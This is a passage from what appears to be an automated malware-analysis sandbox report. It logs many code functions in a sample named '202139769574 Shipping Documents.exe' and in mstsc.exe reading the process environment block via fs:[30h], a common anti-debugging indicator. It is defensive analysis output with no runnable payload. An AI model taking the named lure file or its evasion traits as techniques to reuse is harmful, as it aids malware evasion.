          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AE8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B71608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AC8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AF37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ADF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00B88F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 2_2_00ACEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04863884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04863884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048120A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048290AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04800050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04800050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04811DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04811DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04811DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04866DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04898DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]
